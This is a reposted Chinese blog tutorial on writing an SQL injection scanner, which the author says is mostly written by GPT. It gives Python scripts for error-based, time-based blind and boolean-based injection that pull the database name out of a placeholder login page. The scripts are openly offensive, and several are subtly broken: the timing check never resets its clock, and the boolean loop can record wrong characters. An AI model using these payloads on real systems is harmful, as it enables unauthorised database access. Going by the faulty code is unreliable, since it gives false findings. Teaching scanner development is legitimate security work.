[安全开发] SQL注入扫描(一股子GPT味~)

这篇具有很好参考价值的文章主要介绍了[安全开发] SQL注入扫描(一股子GPT味~)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

实际上大部分都是它写的,它真我哭

SQL注入扫描就是一种用于检测和预防SQL注入攻击的工具。它通过模拟SQL注入攻击的方式,向目标网站发送特定的SQL查询语句,以验证目标网站是否存在SQL注入漏洞。SQL注入扫描的过程通常分为以下几个步骤:

  1. 收集信息:扫描器会首先向目标网站发送各种类型的请求,例如HTTP GET、POST等,以获取目标网站的响应,进而收集关于目标网站的信息。
  2. 发现漏洞:扫描器会尝试使用各种常见的SQL注入技巧来探测目标网站是否存在SQL注入漏洞。例如,它会向目标网站发送一些特定的字符,以验证是否存在对输入数据进行检查的措施。
  3. 验证漏洞:如果扫描器成功地发现了SQL注入漏洞,它会尝试利用该漏洞来验证其有效性。例如,它会发送一些恶意的SQL查询语句,以查看是否能够成功地从目标网站的数据库中提取数据。
  4. 报告结果:扫描器会将其扫描结果整理成报告,包括发现的漏洞类型、漏洞的位置、漏洞的影响程度等信息。

总的来说,SQL注入扫描可以帮助网站管理员及时检测和预防SQL注入攻击,从而保护网站和数据库的安全。

下面分别描述这四部分

收集信息

为什么我们要收集信息?

比如说我们对于http://www.example.com/网站进行扫描,就要先使用爬虫获取扫描目标,没有扫描目标的话,直接对着http://www.example.com/怼,能够扫出漏洞我愿意称之为天选之子。

假设现在收集到了1000个网址,包含了:

  • http://www.example.com/images/1.jpg
  • http://www.example.com/images/2.jpg
  • http://www.example.com/js/upload.js
  • http://www.example.com/admin/login.php
  • http://www.example.com/1.html
  • http://www.example.com/page/1.php?id=1
  • .....

如果你是一个渗透测试工程师,你第一反应是检测哪个网址?

So,这也是我们脚本需要实现的东西

不可能每个网址都扫描一遍吧,恰好我们有100个验证SQL注入的POC,那么就需要发送1000*100个包,这对该网站是一个噩梦,当然也有可能刚开始扫就被防火墙给拦截了,或者很多东西都是错误网址,浪费了扫描器的时间

所以我们需要在收集信息这一步将一些干扰信息排除掉,具体来说,需要分析目标网站的响应数据,包括响应头、响应体、响应码等信息,以获取目标网站的状态和特征等

发现漏洞&验证漏洞

这里其实是POC和EXP的区别,这里我们统一用POC来解释

我们根据SQL注入的不同类型来编写SQL注入的检测脚本,因为这里的分类因人而异,这里只进行前三中的安全开发扫描简述

  • 报错注入
  • 时间盲注
  • 布尔注入
  • 宽字节注入
  • 联合注入
  • 堆叠注入
  • 二次注入
  • ....

报错注入检测脚本

报错注入是一种常见的SQL注入技术,其基本原理是通过构造恶意的SQL查询语句,使目标网站返回错误信息,从而获得有关目标数据库的敏感信息

它的检测关键点在于回显需要有报错信息,在下面的脚本中报错回显是

"You have an error in your SQL syntax"

使用python编写一个实例脚本

import requests

# 定义目标网站URL和注入参数
target_url = 'http://www.example.com/login.php'
injection_param = 'username'

# 构造注入语句
injection_payload = "' or 1=1 union select 1,2,3,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()-- "

# 发送恶意请求
payload = {injection_param: injection_payload}
response = requests.post(target_url, data=payload)

# 分析响应并检测是否存在SQL注入漏洞
if "You have an error in your SQL syntax" in response.text:
    print("SQL注入漏洞存在")
else:
    print("SQL注入漏洞不存在")

时间盲注检测脚本

时间盲注,最重要的就是时间

import requests
import time

# 定义目标网站URL和注入参数
target_url = 'http://www.example.com/login.php'
injection_param = 'username'

# 构造注入语句
injection_payload = "' or if(substr(database(),{pos},1)='{char}', sleep(5), null)-- "

# 发送恶意请求并计时
start_time = time.time()
for i in range(1, 20):   # 假设数据库名称长度不超过20个字符
    for j in range(33, 127):   # ASCII码表中可见字符的范围
        # 替换注入语句中的占位符
        payload = {injection_param: injection_payload.format(pos=i, char=chr(j))}
        response = requests.post(target_url, data=payload)
        # 如果响应时间大于5秒,则表示猜测的字符是正确的
        if time.time() - start_time > 5:
            print("第{}位字符为:{}".format(i, chr(j)))
            break
    else:
        continue
    break

以上脚本中,我们首先定义了目标网站的URL和注入参数,然后构造了一个注入语句,其中使用了时间盲注的技巧,使用sleep函数控制响应时间。接着,我们使用一个双重循环来猜测数据库名称中的每一个字符,如果猜测正确,则响应时间会超过5秒,从而得到正确的字符

布尔注入检测脚本

布尔注入的基本原理是通过构造恶意的SQL查询语句,使目标网站返回不同的响应结果(True或False)

这里的True和False是什么?

水无常形,需要根据情况讨论,如果我们的一个SQL注入脚本,正确的时候,是返回200状态码,失败的时候,返回404状态码,这里的对应

  • True 200
  • False 404

另一种情况,正确的时候,返回个人信息,失败的时候,返回为空,这里的对应

  • True 获得个人信息
  • False 空信息

在下面这个脚本中,Login failed为False,登录成功为True ,通过判断响应结果中是否包含“Login failed”来判断猜测是否正确

import requests

# 定义目标网站URL和注入参数
target_url = 'http://www.example.com/login.php'
injection_param = 'username'

# 构造注入语句
injection_payload = "' or ascii(substr(database(),{pos},1))={char}-- "

# 猜测数据库名称的长度
for length in range(1, 20):   # 假设数据库名称长度不超过20个字符
    # 猜测每一位字符
    database_name = ''
    for i in range(1, length+1):
        for j in range(33, 127):   # ASCII码表中可见字符的范围
            # 替换注入语句中的占位符
            payload = {injection_param: injection_payload.format(pos=i, char=j)}
            response = requests.post(target_url, data=payload)
            # 判断响应结果是否发生变化
            if 'Login failed' in response.text:
                break
        else:
            continue
        database_name += chr(j)
        break
    else:
        break

print("数据库名称为:", database_name)

输出报告

这玩意不用我说了吧 😃

浅谈检测的优化

关于漏洞检测的优化,我觉得这东西可以写一本书,这里简单说几个抛砖引玉

在第一步我们获取到扫描目标后,我们需要进行一波过滤,可以定义一个字典 ['js','jpg','png']等等,将对应的静态后缀给过滤掉,不进入到第二步的扫描中,节省扫描时间

在时间盲注中,如果我们用国内的扫描器扫描国外的网站,可能你正常访问国外的网站,等待的时间都需要10秒,检测脚本中等待的5秒都属于正常的网络抖动,误报率会非常高,这种情况下可以先发几个包到需要检测的网站上,计算一个平均访问时间,在平均访问时间上构造盲注时间,这样来提高准确率

OK,SQL注入扫描就到这里啦,自己编写扫描脚本的时候,需要根据扫描结果来不断优化迭代,进而让脚本趋于完善,共勉

END

建了一个微信的安全交流群,欢迎添加我微信备注进群,一起来聊天吹水哇,以及一个会发布安全相关内容的公众号,欢迎关注 😃文章来源地址https://www.toymoban.com/news/detail-453850.html

加我拉你入群 黑糖安全公众号

到了这里,关于[安全开发] SQL注入扫描(一股子GPT味~)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【网络安全】SQL注入--宽字节注入

    宽字节注入,在 SQL 进行防注入的时候,一般会开启 gpc,过滤特殊字符。 一般情况下开启 gpc 是可以防御很多字符串型的注入,但是如果数据库编码不 对,也可以导致 SQL 防注入绕过,达到注入的目的。如果数据库设置宽字节字 符集 gbk 会导致宽字节注入,从而逃逸 gpc 前提

    2023年04月13日
    浏览(58)
  • 安全测试-SQL注入

    SQL注入是针对一种数据库而言的,而不是针对网页语言。在任何使用了数据库查询环境下都可能存在。常见的数据库包括:MySQL、Oracle、Db2等。针对不同的数据库系统使用的一些函数会有所不同,不过从测试是否存在SQL注入的角度考虑,只需要进行几个最基本的判断语句就可

    2024年02月08日
    浏览(36)
  • 安全狗SQL注入绕过

    本文用sqli-labs第一关为例 一、简单注入 开启安全狗后尝试正常注入,发送请求后可以看到被安全狗拦截了 寻找被安全狗匹配的特征字符,这里没被拦截 原来是当and 与 xx=xx 同时出现的时候会被安全狗识别 1.1 简单注入绕过方式 这里可以使用mysql的内联注释来进行绕过 内联注

    2024年02月08日
    浏览(46)
  • SQL注入绕过安全狗

    如果程序中设置了过滤,但是程序只是对 and ,AND 或者 or,OR 设置了过滤,那么你就可以使用大小写过滤 例如 :and,or 当然不局限于 and,其它的例如 union 一些如果只是设置了过滤,没有进行深度过滤的话,都是可以使用大小写过滤的 union 设置了过滤

    2024年02月15日
    浏览(51)
  • 【WEB安全】SQL注入挖掘

    2021年OWASP发布漏洞威胁榜单,SQL注入从第一名下降到第三(https://owasp.org/Top10/),SQL注入是一种常见的Web攻击技术,通过构造恶意的SQL语句来破坏数据库安全。攻击者可以通过提交带有恶意代码的输入,例如网页表单,来控制数据库执行恶意语句。这样,攻击者可以访问敏感

    2024年02月13日
    浏览(38)
  • 【网络安全】SQL注入详解

    SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库。 1:寻找到SQL注入的位置 2:判断服务器类型和后台数据库类型 3:针对不同的服务器和数据库特点进行SQL注入攻击

    2024年02月06日
    浏览(54)
  • 网络安全---SQL注入攻击

            SQL 注入是一种代码注入技术,可利用 Web 应用程序和数据库服务器之间接口中的漏洞。当用户的输入在发送到后端数据库服务器之前未在 Web 应用程序中正确检查时,该漏洞就存在。         许多 Web 应用程序从用户处获取输入,然后使用这些输入构建 SQL 查询

    2024年04月12日
    浏览(47)
  • 【网络安全】初探SQL注入漏洞

    要想玩SQL注入,一个简单的数据交互页面是需要的,故我们用PHP做一个简易网页,有登录、注册和首页三块内容。 登录需要输入账号密码,等待提交后进入系统; 注册需要输入名字,密码,手机号,照片,等待提交后进入系统; 首页需要利用PHP和数据库联动后的查询语句,

    2024年02月16日
    浏览(40)
  • 浏览器安全之SQL注入

    SQL注入漏洞是指,攻击者能够利用现有Web应用程序,将恶意的数据插入SQL查询中,提交到后台数据库引擎执行非授权操作。 ●非法查询、修改或删除数据库资源。 ●执行系统命令。 ●获取承载主机操作系统和网络的访问权限。 SQL注入漏洞的风险要高于其他所有的漏洞,原因

    2024年02月16日
    浏览(30)
  • Web安全-初识SQL注入(一)

    将不受信任的数据作为命令或查询的一部分发送到解析器时,会产生诸如SQL注入、NoSQL注入、OS 注入和LDAP注入的注入缺陷。攻击者的恶意数据可以诱使解析器在没有适当授权的情况下执行非预期命令或访问数据。 注入能导致数据丢失、 破坏或泄露给无授权方,缺乏可审计性

    2024年02月05日
    浏览(47)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包